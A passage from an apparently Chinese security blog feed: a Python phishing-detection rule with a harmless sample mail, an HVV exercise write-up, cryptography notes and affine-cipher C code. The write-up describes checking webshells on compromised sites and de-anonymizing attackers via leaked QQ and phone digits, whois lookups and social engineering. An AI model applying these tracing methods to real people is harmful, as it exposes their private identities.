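def exe_attachments(msg):
    """(file name, content type) for every MIME part whose file name ends in .exe."""
    found = []
    for part in msg.walk():
        name = part.get_filename()   # decodes RFC 2231 encoded names
        if name and re.search(r"\.exe$", name, re.IGNORECASE):
            found.append((name, part.get_content_type()))
    return found


def evaluate(raw):
    """Return (matched, reasons); the rule fires only when all four conditions hold."""
    msg = email.message_from_string(raw)
    reasons = []
    domain = sender_domain(msg)
    if domain in SENDER_DOMAINS:
        reasons.append("sender domain " + domain)
    subject = str(msg.get("Subject", ""))
    hits = [t for t in SUBJECT_TERMS if t in subject]
    if hits:
        reasons.append("subject terms " + ",".join(hits))
    octet = [n for n, ctype in exe_attachments(msg) if ctype == "application/octet-stream"]
    if octet:
        reasons.append("octet-stream exe " + ",".join(octet))
    kws = sorted({k for k in KEYWORDS for text in [subject] + octet if k in text})
    if kws:
        reasons.append("keywords " + ",".join(kws))
    return len(reasons) == 4, reasons


# Constructed message: a "meeting agenda notice" from a free-mail domain carrying
# 报告.exe (the name is RFC 2231 encoded, as a real mail client would send it).
SAMPLE_MAIL = """From: hr2022@qq.com
To: staff@example.org
Subject: 会议日程通知
Date: Mon, 15 Aug 2022 09:00:00 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

see attachment
--b1
Content-Type: application/octet-stream; name="report.exe"
Content-Disposition: attachment; filename*=utf-8''%E6%8A%A5%E5%91%8A.exe
Content-Transfer-Encoding: base64

QUJD
--b1--
"""
```

The returned reasons list is what an analyst would want in the alert: it names which condition matched, so a near miss (three of four) can be reviewed rather than silently dropped.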
<summary type="html">
<h2 id="APT浅析"><a href="#APT浅析" class="headerlink" title="APT浅析"></a>A Brief Analysis of APT</h2>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>HVV Work Summary</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/08/11/HVV%E5%B7%A5%E4%BD%9C%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/08/11/HVV%E5%B7%A5%E4%BD%9C%E6%80%BB%E7%BB%93/</id>
<published>2022-08-11T09:56:49.428Z</published>
<updated>2022-08-12T07:42:40.346Z</updated>
<content type="html"><![CDATA[<h3 id="HVV工作总结"><a href="#HVV工作总结" class="headerlink" title="HVV工作总结"></a>HVV Work Summary</h3><a id="more"></a>
<h4 id="一、准备工作"><a href="#一、准备工作" class="headerlink" title="一、准备工作"></a>1. Preparation</h4>
<p>In the two weeks before the HVV exercise started, I collected and organised POCs for existing OA product vulnerabilities, web application vulnerabilities and CMS vulnerabilities, as well as the attack signatures of common webshell tools such as Behinder (冰蝎), AntSword (蚁剑), Godzilla (哥斯拉) and Shiro. I verified and wrote more than two hundred packet rules covering request headers, request bodies, response headers, response bodies and returned status codes, so that during HVV everyone could better detect the various attack techniques on the platform. Of course I had never dealt with these vulnerabilities before, so I ran into many difficulties and made many mistakes in the process.</p>
<h4 id="二、护网情况"><a href="#二、护网情况" class="headerlink" title="二、护网情况"></a>2. The HVV Exercise</h4>
<p>During HVV my mentor and I belonged to the attribution analysis group. Our main task was to trace the personal information of red-team members and write attribution reports, but we also had to take on some other work.</p>
<p>1. Updating packet rules</p>
<p>After HVV started, all kinds of 0-day, 1-day and other vulnerabilities could be disclosed every day. I had to collect the POCs of these public vulnerabilities from forums, websites, blogs and GitHub, plus the POCs of some undisclosed vulnerabilities obtained from hq, then organise and update the packet rules and upload them to our platform promptly, so that when such a vulnerability was used against our enterprises we could detect it in time. During this period I also had to do vulnerability verification: many enterprises showed up on the platform as having Godzilla, Behinder or AntSword injected, but the injection had not necessarily succeeded, so I used those webshell management tools to connect to the URLs. If the connection succeeded, the en terprise had actually been compromised; in that case I told 惠祁, who would communicate with the enterprise and take concrete measures.</p>
<p>2. Sample analysis</p>
<p>Because I had done some reverse-engineering challenges at school and taken part in a few competitions, I also took part in some sample analysis during this HVV. Take an ordinary phishing sample as an example; the main tools used were PEiD, StudyPE, IDA, x64dbg and HuoRong Sword (火绒剑). First we run the sample in a sandbox to check for malicious behaviour such as process and network activity. From that we can already see that the virus starts with a hidden interface, hides in another directory, and can modify the network proxy and connect to several domains, among other things. We must analyse samples in a virtual machine; this is real malware, so don't wipe out your own host. After running the sample, HuoRong Sword captures its actions: setting registry keys, creating processes, creating, deleting, modifying and reading files, sending network packets and so on. Typical samples are packed with UPX or VMP, and we have to unpack them manually to continue the analysis properly. Combining IDA and x64dbg, we can see more clearly that this sample generates a random number from the time, concatenates it into a file name and copies itself to the C drive. In the thread it creates, the analysis shows a weak-password attack: many weak passwords are built into the IPC routine, and using a function that obtains host names and network connections it infects other hosts on the LAN through weak passwords. There are many more details of the analysis that I won't explain here; if I have time I will write up the analysis of each sample separately. In short, analysis yields the sample's concrete logic and behaviour as well as sensitive information or external IPs. Although my first analysis of a phishing sample did not achieve the expected result and only produced some CDN IPs, this HVV gave me a lot of analysis experience, and I hope to do better and satisfy myself next time.</p>
<p>3. Attribution</p>
<p>This was also my first HVV, so I can say I had zero experience. After a few days of exploring, we gradually found some correct approaches. First, based on the large number of packet rules we had entered on the platform earlier, we could export IPs in bulk every day; after filtering out internal IPs, we put the remaining IPs into ThreatBook (微步) for batch lookup and then filtered out the traceable malicious red-team IPs on Tencent Cloud, Alibaba Cloud, Baidu Cloud and the like. Take Tencent Cloud IPs as an example: on the Tencent Cloud website, by capturing packets, one can obtain the first and last few digits of the QQ number and the first and last few digits of the phone number of the person who registered the IP, and then query registered-domain information through various whois and reverse-IP-to-domain lookup sites. This may reveal the registrant's QQ mailbox or a mailbox containing a phone number; we then check whether those QQ numbers or phone numbers match the ones captured from Tencent Cloud, and if they match, the loop is closed. With this information we then use various techniques and social engineering to find other information, including a GitHub address, name, company or school. That is enough to produce an attribution report.</p>
<p>We can also scan ports to see whether a red-team IP has unusual ports open. In this HVV one IP had port 8000 open, and from that port we traced the person's concrete information.</p>
<p>Attribution techniques vary endlessly and there is no single method; in the first few days we tried many wrong approaches, but once we figured out the pattern things gradually got on track. During this HVV we produced 6 attribution reports in total and promptly fed the red-team information and attack techniques back to the enterprises.</p>
<h4 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a><strong>3. Summary</strong></h4>
<p>The opportunity to take part in HVV is rare, and fortunately I did not waste a single day of it. Every day brought new challenges and new things to learn. It was hard work but very fulfilling. I look forward to keeping on improving and absorbing new knowledge in my future work, to lay a solid foundation for the next HVV.</p>]]></content>
<summary type="html">
<h3 id="HVV工作总结"><a href="#HVV工作总结" class="headerlink" title="HVV工作总结"></a>HVV Work Summary</h3>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>Cryptography Review Notes</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/13/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%A4%8D%E4%B9%A0/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/13/%E5%AF%86%E7%A0%81%E5%AD%A6%E5%A4%8D%E4%B9%A0/</id>
<published>2021-01-13T00:43:31.463Z</published>
<updated>2021-01-25T03:50:57.069Z</updated>
<content type="html"><![CDATA[<p>Can't focus in the library, so here is a quick review summary to pad the blog!</p><a id="more"></a>
<h2 id="第一章-密码学概述"><a href="#第一章-密码学概述" class="headerlink" title="第一章 密码学概述"></a>Chapter 1: Overview of Cryptography</h2>
<p>Cryptography: a cipher is a set of symbols, composed according to specific rules, used to transform the information exchanged between two communicating parties from plaintext to ciphertext. Put differently, a cipher is a sequence of symbols that hides the real content.</p>
<p>It is an interdisciplinary field combining mathematics, computer science, electronics, communications and other disciplines, and is the science of the security and confidentiality of information systems.</p>
<p>A cryptosystem consists of five parts: the plaintext space M, the ciphertext space C, the key space K, the encryption algorithm E and the decryption algorithm D.</p>
<h2 id="第三章-古典密码"><a href="#第三章-古典密码" class="headerlink" title="第三章 古典密码"></a>Chapter 3: Classical Ciphers</h2>
<p>Affine cipher: choose two parameters k1, k2 with gcd(k1, 26) = 1.<br>Encryption: C = k1*m + k2 mod 26. Decryption: m = (C - k2) * k1^(-1) mod 26.</p>
<h2 id="第四章-分组密码"><a href="#第四章-分组密码" class="headerlink" title="第四章 分组密码"></a>Chapter 4: Block Ciphers</h2>
<p>Design requirements for block ciphers:</p>
<p>The block length must be large enough: if n is the block length, 2^n must be large enough to prevent exhaustive plaintext attacks<br>The key space must be large enough: to prevent exhaustive key search<br>The cipher transformation must be complex enough: so that, apart from brute force, the attacker finds no concise mathematical attack<br>Encryption and decryption must be simple: easy to implement in software and hardware</p>
<p>No data expansion or compression</p>
<p>Diffusion principle (permutation): every bit change in the key or plaintext affects many bits of the ciphertext, hiding the statistical properties of the plaintext (informally called the avalanche effect)</p>
<p>Confusion principle (substitution): the dependency between key, plaintext and ciphertext is made as complex as possible to prevent cryptanalysis by statistical analysis (e.g. by using non-linear transformations)</p>
<p>Product cipher system</p>
<p>The advantage of the Feistel network is the similarity of encryption and decryption: only a reversed key schedule is needed, and the encryption and decryption parts are almost identical</p>
<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/13/FtmKHajRQqOvJyz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>
<p>An SP network is a transformation network built from multiple S transforms and P transforms<br>The basic operations are the S transform (substitution) and the P transform (permutation); the former is called an S-box, the latter a P-box<br>S-boxes provide confusion, P-boxes provide diffusion</p>
<p>DES round function F: expansion permutation (E-box), key addition, non-linear substitution (S-boxes), linear permutation (P-box)</p>
<p>Encryption equations:<br>L0R0 ← IP(64-bit plaintext)<br>Ln ← Rn-1<br>Rn ← Ln-1 ⊕ F(Rn-1, Kn)<br>(64-bit ciphertext) ← IP^(-1)(R16L16)</p>
<p>Decryption equations:<br>R16L16 ← IP(64-bit ciphertext)<br>Rn-1 ← Ln<br>Ln-1 ← Rn ⊕ F(Ln, Kn)<br>(64-bit plaintext) ← IP^(-1)(L0R0)</p>
<p>S-box design criteria: good non-linearity (every output bit depends on all input bits)<br>Every row contains all 16 4-bit binary values<br>When two inputs differ in 1 bit, the outputs differ in 2 bits<br>If two inputs differ exactly in the middle two bits, the outputs differ in at least two bits<br>If two inputs differ in the first two bits and agree in the last two bits, the outputs must differ<br>There are 32 pairs of inputs that differ in 6 bits; no more than 8 of these pairs have the same output</p>
<p>DES subkeys are generated from the initial key (seed key)<br>The seed key K is 64 bits, of which 8 are parity bits located at positions 8, 16, 24, 32, 40, 48, 56 and 64<br>The parity bits check for errors that may occur while the key K is generated, distributed and stored<br>The effective DES key is only 56 bits</p>
<p>Security of DES. Complementation property: take the bitwise complement of the plaintext m, written m̄, and of the key K, written k̄; if c = E_k(m), then c̄ = E_k̄(m̄). This is called the algorithmic complementation property.<br>It follows from the placement of the two XOR operations in the algorithm, one before the S-boxes and one after the P-box permutation. If the plaintext and key of DES are complemented at the same time, the output of the expansion E and the output of the subkey generator are both complemented, so the XOR output is the same as without complementation, i.e. the input reaching the S-boxes is unchanged and so is their output; but at the second XOR the left half has been complemented, so the output is complemented too.<br>Weak keys: when generating subkeys from the initial key K, the seed key is split into two halves; if K makes every bit of each half all 0 or all 1, every subkey produced by the key generator is the same, i.e. K1 = K2 = ... = K16, and K is called a weak key (there are 4). If K is a weak key, then for any 64-bit message: E_k(E_k(m)) = m and D_k(D_k(m)) = m.<br>Semi-weak keys: encrypt a plaintext to the same ciphertext, i.e. there are two different keys k and k' such that E_k(m) = E_k'(m). They have the following property: if k and k' are a pair of such keys and m is a plaintext block, then E_k'(E_k(m)) = E_k(E_k'(m)) = m.<br>Other factors: number of rounds, key length.</p>
<p>AES round: SubBytes, ShiftRows, MixColumns, AddRoundKey</p>
<p>Multiply by 0x01: unchanged<br>Multiply by 0x02: if the high bit is 0, shift left by one; if the high bit is 1, shift left by one and XOR with 0001 1011<br>Multiply by 0x03: 0000 0011 = 0000 0010 ⊕ 0000 0001<br>So multiplying by 0x03 can be split into multiplying by 0x01 and by 0x02 separately and XORing the results.</p>
<p>Similarities between AES and DES: the round functions of both consist of three layers, a non-linear layer, a linear mixing layer and a subkey XOR, only in a different order<br>The subkey XOR of AES corresponds to the subkey XOR before the S-boxes in DES<br>The purpose of the AES MixColumns operation is to let different bytes influence each other; adding the output of the F function to the left half in DES has a similar effect<br>The non-linear operation of AES is the byte substitution (ByteSub), corresponding to the only non-linear operation in DES, the S-box<br>The ShiftRows operation ensures that the bytes of each row affect not only the corresponding bytes of the other rows but all bytes of the other rows, similar to the permutation P in DES</p>
<p>Differences between AES and DES: the AES key length (128, 192 or 256 bits) is variable, whereas the DES key length is fixed at 56 bits<br>DES is bit-oriented, AES is byte-oriented<br>The AES encryption and decryption operations differ, so an encryptor cannot also serve as a decryptor; DES has no such restriction</p>
<p>Electronic codebook mode (ECB): an error in the ciphertext data makes the whole corresponding plaintext block decrypt incorrectly, without affecting the decryption of other ciphertext blocks<br>Cipher block chaining mode (CBC): no plaintext error propagation; an error in a single ciphertext block affects the corresponding decrypted plaintext block and the one after it</p>
<p>Cipher feedback mode (CFB): a single plaintext error affects all subsequent ciphertext, but on decryption only one plaintext block is wrong; a single error in the ciphertext causes an error in the corresponding decrypted plaintext, enters the shift register and corrupts the encryption output until the error is shifted out the other end of the register. In 8-bit CFB, a 1-bit ciphertext error produces a 9-bit plaintext error after decryption</p>
<p>Output feedback mode (OFB): one-to-one errors; loss of synchronisation is fatal</p>
<p>Counter mode (CTR): parallelism, hardware efficiency, software efficiency, preprocessing, random access, provable security, simplicity</p>
<h2 id="第六章-哈希函数"><a href="#第六章-哈希函数" class="headerlink" title="第六章 哈希函数"></a>Chapter 6: Hash Functions</h2>
<p>The concept of a hash function</p>
<p>•A hash function is an irreversible one-way cryptographic primitive that transforms a message M of arbitrary length into a shorter, fixed-length value H(M)</p>
<p>•H(M) is called the hash value, hash code or message digest</p>
<p>•H(M) bears the imprint of the input string and is also called a <strong>digital fingerprint</strong></p>
<p>Basic characteristics of a hash function:</p>
<p>•<strong>The algorithm is public and needs no key</strong></p>
<p>•<strong>Data compression:</strong> input data of <strong>arbitrary length</strong> is transformed into a <strong>fixed-length output</strong></p>
<p>•<strong>Easy to compute:</strong> for any given m, h(m) is easy to compute</p>
<p>•One-wayness (pre-image resistance): given the hash value h(m) of a message, it is computationally infeasible to obtain the message m</p>
<p>The function <em>y</em> = <em>H</em>(<em>x</em>) satisfies:</p>
<p>I. It compresses a bit string <em>x</em> of arbitrary length into a bit string <em>y</em> of fixed length</p>
<p>II. Given <em>x</em>, computing <em>y</em> = <em>H</em>(<em>x</em>) is easy; given <em>y</em>, finding an <em>x</em> with <em>y</em> = <em>H</em>(<em>x</em>) is computationally infeasible (one-wayness)</p>
<p>III. Finding (<em>x</em>1, <em>x</em>2) with <em>x</em>1 ≠ <em>x</em>2 and <em>H</em>(<em>x</em>1) = <em>H</em>(<em>x</em>2) is computationally infeasible (collision resistance)</p>
<p>A hash function must satisfy the following security requirements:</p>
<p>Weak collision resistance (second pre-image resistance): for any given message m, finding a message m' ≠ m with h(m) = h(m') is computationally infeasible</p>
<p>Strong collision resistance: finding any two different messages m and m' with h(m) = h(m') is computationally infeasible</p>
<p>Message padding</p>
<p>•Step 1 (pad the message): make the message length ≡ 448 mod 512</p>
<p>•If the message length is already exactly 448 mod 512, add 512 padding bits; the number of padding bits is therefore between 1 and 512</p>
<p>•Padding method: the first bit is 1, all remaining bits are 0</p>
<p>•Step 2 (append the length): represent the message length as a 64-bit value</p>
<p>•If the length exceeds what 64 bits can represent, only the low 64 bits are kept</p>
<p>•Append it after the padding so that the data is a multiple of 512 bits</p>
<p>•Each 512-bit block is split into 16 32-bit words. The final output is a 128-bit (16-byte, 32 hex digit) message digest. The process has 4 rounds of 16 steps each, 64 steps in total.</p>
<h2 id="第七章-公钥密码"><a href="#第七章-公钥密码" class="headerlink" title="第七章 公钥密码"></a>Chapter 7: Public-Key Cryptography</h2>
<p>Key generation</p>
<ol><li>Choose two large primes p and q (p ≠ q; they must be kept secret, and it is recommended to destroy them after step 4)</li></ol>
<ol start="2"><li><p>Compute n = p×q and φ(n) = (p-1)×(q-1)</p></li><li><p>Choose an integer e with gcd(φ(n), e) = 1 and 1 < e < φ(n)</p></li><li><p>Compute d such that d = e^(-1) mod φ(n)</p></li></ol>
<p>Result: the public key is {e, n}; the private key is {d}</p>
<p>Encryption (with e, n): plaintext M < n, ciphertext C = M^e (mod n).</p>
<p>Decryption (with d, n): ciphertext C, plaintext M = C^d (mod n)</p>
<p>Correctness:<br>1. If gcd(m, n) = 1:<br>C^d mod n = (m^e)^d mod n = m^(ed) mod n ≡ m mod n<br>2. If gcd(m, n) > 1: since n = pq, gcd(m, n) must contain one of p and q. Suppose gcd(m, n) = p, i.e. m = cp with 1 ≤ c ≤ q. By Euler's theorem:<br>m^(φ(q)) ≡ 1 (mod q)<br>m^((q-1)(p-1)k) ≡ 1 (mod q)<br>i.e. m^(kφ(n)) ≡ 1 (mod q), or 1 = m^(kφ(n)) + hq<br>From the assumption m = cp:<br>m = m^(kφ(n)+1) + chpq = m^(kφ(n)+1) + an (where a = ch),<br>i.e. m^(kφ(n)+1) ≡ m (mod n)</p>
<p>Common modulus attack: suppose m is the plaintext, the two users' public exponents are e1 and e2 with gcd(e1, e2) = 1, the modulus N is shared, and the two ciphertexts are:<br>c1 ≡ m^(e1) mod N<br>c2 ≡ m^(e2) mod N<br>The attacker knows N, e1, e2, c1 and c2 and can recover the plaintext m as follows:<br>since gcd(e1, e2) = 1, the Euclidean algorithm gives r, s with r*e1 + s*e2 = 1. Suppose r is negative; then<br>(c1^(-1))^(-r) · c2^s = m^(r*e1 + s*e2) ≡ m mod N</p>
<p>Low-exponent attack: a small public exponent speeds up encryption, but a public exponent that is too small is vulnerable to attack</p>
<p>If 3 users all use 3 as the public exponent and the same plaintext m is encrypted for each, then c1 = m^3 (mod n1), c2 = m^3 (mod n2), c3 = m^3 (mod n3), with gcd(n1, n2, n3) = 1 and m < n1, m < n2, m < n3</p>
<p>By the Chinese remainder theorem, c can be computed from c1, c2, c3 with c = m^3 mod (n1 n2 n3); clearly m^3 < n1 n2 n3, so m = c^(1/3)</p>
<p>1. <strong>Key generation</strong> (ElGamal)</p>
<p>Choose a large prime p and a generator g ∈ Z_p^*; p and g are system parameters shared by all users</p>
<p>Each user U in the system picks a random integer x with 2 ≤ x ≤ p-2 and computes:</p>
<p>y = g^x (mod p),</p>
<p>y, p, g form user U's public key, and x is user U's private key</p>
<p>2. <strong>Encryption:</strong></p>
<p>1. User A first encodes the plaintext M as an integer m between 0 and p-1;</p>
<p>2. User A picks a secret random number r (2 ≤ r ≤ p-2) and computes: c1 = g^r (mod p);</p>
<p>c2 = m·y^r (mod p)</p>
<p>3. User A sends the pair (c1, c2) to user B as the ciphertext</p>
<p>Decryption:<br>After receiving the ciphertext pair (c1, c2), user B computes:<br>m = c2·(c1^x)^(-1) mod p</p>
<p>Correctness: c2·(c1^x)^(-1) (mod p) = (y^r m)(g^(rx))^(-1) (mod p)<br>= (g^(rx) m) g^(-rx) (mod p)<br>= m (mod p)</p>
<h2 id="第八章-数字签名"><a href="#第八章-数字签名" class="headerlink" title="第八章 数字签名"></a>Chapter 8: Digital Signatures</h2>
<p>2. Digital signatures with RSA:<br>(1) Signing algorithm<br>Let M be the message, KeA = <e, n> A's public encryption key,<br>KdA = <d, p, q, φ(n)> A's secret decryption key.<br>A's signature on M is<br>SA = D(M, KdA) = (M^d) mod n; SA is A's signature on M.<br>Verification of the signature:<br>E(SA, KeA) = (M^d)^e mod n = M</p>
<p>Security:</p>
<p>Attacks on RSA signatures: attacking with existing signatures. Here S1 = (H(M1))^d mod n and S2 = (H(M2))^d mod n,<br>but (H(M1))^d (H(M2))^d ≠ (H(M1M2))^d mod n,<br>so S3 ≠ S1·S2, and A's signature on M3 cannot be computed from S1 and S2.</p>
<p>Another role of H(M): speeding up signing<br>Signing the whole message is slow, because public-key schemes are slow and both signing and verification become quite slow when the message is long<br>Signing the hash of the message means the signature cost depends only on the hash length, however long the message</p>
<p>ElGamal signature process:</p>
<p>1. System initialisation: the public key is (p, g, y), the private key is x (1 ≤ x < p-1), where y ≡ g^x mod p</p>
<p>2. Signing: given a message M, the signer computes:</p>
<p>① choose a random k ∈ Z_p^* with k coprime to (p-1);</p>
<p>② first compute the hash H(M) of the message M, then compute:</p>
<p>r ≡ g^k (mod p);</p>
<p>s ≡ (H(M) - xr) k^(-1) (mod p-1)</p>
<p>③ send (r, s) as the signature to the recipient together with M</p>
<p>3. Verification: after receiving M and its signature (r, s), the recipient:</p>
<p>① computes the hash H(M) of the message M;</p>
<p>② checks the equation</p>
<p>y^r r^s ≡ g^(H(M)) mod p</p>
<p>If it holds, (r, s) is accepted as a valid signature; otherwise the signature is considered forged</p>
<p>Security:</p>
<p>It is a non-deterministic signature algorithm: the signature on the same message M depends on the random number k. Its security rests on the difficulty of computing discrete logarithms in a finite field. The random number k must not be leaked (with k known, x can be computed: x = (m - ks) r^(-1) mod (p-1)). The random number k must not be reused (this leaks x). Without a hash function the scheme is open to attack: the attacker can choose any integer pair (u, v) with gcd(v, p-1) = 1, compute r = g^u y^v mod p = g^(u+xv) mod p and s = -r v^(-1) mod (p-1); then (r, s) is a valid signature on the message m = su mod (p-1), because k = (m - xr) s^(-1) = (su - xr) s^(-1) = (u + xv) mod (p-1), so r = g^k = g^(u+xv) mod p</p>
<h2 id="第九章-密码协议"><a href="#第九章-密码协议" class="headerlink" title="第九章 密码协议"></a>Chapter 9: Cryptographic Protocols</h2><p>Bit commitment 
安全性质:1.隐蔽性:Alice像Bob承诺时,Bob不可能获得承诺消息的任何信息。2.绑定性:一段时间后A能够像B证明她所承诺的消息,但是A不能欺骗B,也就是说,在这段时间里A不能改变承诺的消息。</p>]]></content>
<summary type="html">
<p>Can't get any studying done in the library, so I'll quickly write up a summary and pad out a blog post!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>Cryptography Course Design Report</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/11/%E5%AF%86%E7%A0%81%E5%AD%A6%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1%E6%8A%A5%E5%91%8A/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/11/%E5%AF%86%E7%A0%81%E5%AD%A6%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1%E6%8A%A5%E5%91%8A/</id>
<published>2021-01-11T15:00:42.495Z</published>
<updated>2021-01-12T12:59:01.006Z</updated>
<content type="html"><![CDATA[<p>Borrowed liberally from the blogs of various experts!</p><a id="more"></a>
<h2 id="仿射密码-Affine-Cipher"><a href="#仿射密码-Affine-Cipher" class="headerlink" title="仿射密码 Affine Cipher"></a>Affine Cipher</h2>
<h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>Overview</h3>
<p>The affine cipher is also a monoalphabetic substitution cipher; it uses a linear equation together with a modulus.</p>
<p>The <strong>affine cipher</strong> is a form of monoalphabetic encryption in which every <a href="https://baike.baidu.com/item/字母/1710184" target="_blank" rel="noopener">letter</a> of the alphabet is <a href="https://baike.baidu.com/item/加密/752748" target="_blank" rel="noopener">encrypted</a> with a simple mathematical equation, mapping it to a number and back to a letter.</p>
<h3 id="算法实现"><a href="#算法实现" class="headerlink" title="算法实现"></a>Algorithm implementation</h3>
<h4 id="加密算法"><a href="#加密算法" class="headerlink" title="加密算法"></a>Encryption algorithm</h4>
<p>The encryption algorithm of the affine cipher is a linear transformation, a combination of the shift cipher and the multiplicative cipher: for any plaintext character x, two parameters k1, k2 are chosen with k1, k2 ∈ Z26 and gcd(k1, 26) = 1.</p>
<p>Encryption: C = k1*m + k2 (mod 26) (with k1 = 1 it is a shift cipher; with k2 = 0 it is a multiplicative cipher);</p>
<p>Encryption features: ① basic affine encryption is fully implemented; uppercase maps to uppercase and lowercase to lowercase;</p>
<p>② when k1 is not coprime to 26, a goto jump reports that k1 is invalid and asks for it to be entered again;</p>
<p>③ characters other than letters are left as they are, with no processing, and are output exactly as entered;</p>
<p>④ cin.getline() and cin.ignore() are used so that encryption can be repeated under while (true).</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// assumed context: char s[maxn] holds the input line, k1 and k2 the key with gcd(k1,26)==1 </span></span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">int</span> m[maxn];</span><br><span class="line"><span class="comment">// store each character's shifted position in the array m[maxn] </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line">m[i]=(k1*(<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)+k2)%<span class="number">26</span>;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"******Encryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"The ciphertext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="built_in">cout</span><<s[i];<span class="comment">// non-letters pass through unchanged </span></span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="built_in">endl</span>;</span><br></pre></td></tr></table></figure></div>
<h4 id="解密算法"><a href="#解密算法" class="headerlink" title="解密算法"></a>Decryption algorithm</h4>
<p>Decryption: m = k1^(-1)*(C - k2) (mod 26)</p>
<p>Note: to guarantee that the affine encryption function is a bijection, gcd(k1, 26) = 1 is required.</p>
<div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// assumed context: char s[maxn] holds the ciphertext line, k1 and k2 the key with gcd(k1,26)==1 </span></span><br><span class="line"><span class="keyword">int</span> len=<span class="built_in">strlen</span>(s);</span><br><span class="line"><span class="keyword">int</span> m[maxn];</span><br><span class="line"><span class="keyword">int</span> k1inv=<span class="number">1</span>;<span class="comment">// multiplicative inverse of k1 mod 26, found by trial; it exists because gcd(k1,26)==1 </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> x=<span class="number">1</span>;x<<span class="number">26</span>;x++)</span><br><span class="line"><span class="keyword">if</span>((k1*x)%<span class="number">26</span>==<span class="number">1</span>) k1inv=x;</span><br><span class="line"><span class="comment">// store each character's recovered position in the array m[maxn]; +26 keeps (C-k2) non-negative </span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line">m[i]=(k1inv*((<span class="keyword">int</span>)(s[i]-<span class="string">'A'</span>)-k2+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line">m[i]=(k1inv*((<span class="keyword">int</span>)(s[i]-<span class="string">'a'</span>)-k2+<span class="number">26</span>))%<span class="number">26</span>;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"******Decryption******"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"The plaintext is:"</span><<<span class="built_in">endl</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<len;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(s[i]>=<span class="string">'A'</span>&&s[i]<=<span class="string">'Z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'A'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(s[i]>=<span class="string">'a'</span>&&s[i]<=<span class="string">'z'</span>)</span><br><span class="line"><span class="built_in">cout</span><<(<span class="keyword">char</span>)(<span class="string">'a'</span>+m[i]);</span><br><span class="line"><span class="keyword">else</span></span><br><span 